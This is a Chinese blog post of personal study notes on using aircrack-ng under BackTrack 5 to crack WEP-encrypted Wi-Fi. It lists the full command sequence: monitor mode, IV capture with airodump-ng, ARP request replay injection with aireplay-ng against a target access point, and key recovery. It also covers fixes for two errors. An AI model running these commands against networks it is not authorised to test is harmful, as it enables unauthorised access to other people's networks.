您的位置:首页 > 大数据 > 人工智能

关于aircrack-ng的一些学习笔记及问题

2014-09-26 14:35 716 查看
最近无意中接触到了一些无线方面的技术资料,又发现了一个比较速度的wifi渗透方法,这个虽然没有reaver那么稳定,个人觉得在时间方面要比reaver快的多。可能做实验的笔记本太旧的原因,途中遇到几个问题,如果有同仁遇到,还请指点一二。此处先记录下这几条主要命令备忘。

环境是BT5,默认安装了较高版本,所以不用升级,但还是附上安装命令:

wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
tar zxvf <name of source file>
cd aircrack-ng-XXX
make
make install

下面就拿WEP加密做示例:

查看无线网卡,一般默认是wlan0,如果有外置或其他无线网卡,那就选择相应的网卡启用即可。

单独查看无线网卡信息:iwconfig

启用无线网卡:ifconfig wlan0 up

激活网卡至监听(monitor)模式:
airmon-ng start wlan0

扫描当前地点无线网络信息:
airodump-ng mon0

开始抓包,保存为logas前缀的.ivs后缀,6为AP的频道
airodump-ng --ivs -w longas -c 6 wlan0

在上条命令运行的情况下,打开一个新的终端窗口,输入下面命令对目标AP进行ArpRequest注入攻击,这样采用了一种称之为ArpRequest的方式来读取ARP请求报文,并伪造大量的报文再次重发出去,以便刺激AP产生更多的数据包,从而加快破解过程。
aireplay-ng -3 -b AP-mac -h Client-mac mon0

当IVs值达到2万以上,可尝试下面命令破解
aircrack-ng 捕获的IVS文件

破解成功后,KEYFOUND!后面的ACSI码就是密码

PS:
问题1:
当在新窗口输入airodump-ng --ivs -w longas -c 6 wlan0时,遇到了报错:
ioctl(SIOCSWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE802.11,
AEPHRD_IEEE802.11_FULL or ARPHRD_IEEE80211_PRISM instead. Make
Sysfs injection support was not found either.

我尝试的方法是使用命令:
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo iwconfig wlan0
sudo airmon-ng start wlan0
airodump-ng --ivs -w longas -c 6 wlan0
就可以了

问题2:

aireplay-ng -3 -b AP-mac -h Client-mac mon0时,出现了错误:

Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
因为这条命令并不直接影响结果,暂时也没找到合适解决方法,如果各位有好的解决方法,请指点。

这里只简单的列出了主要用到的命令,仅供实验参考,不得用于非法操作,否则后果自负。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息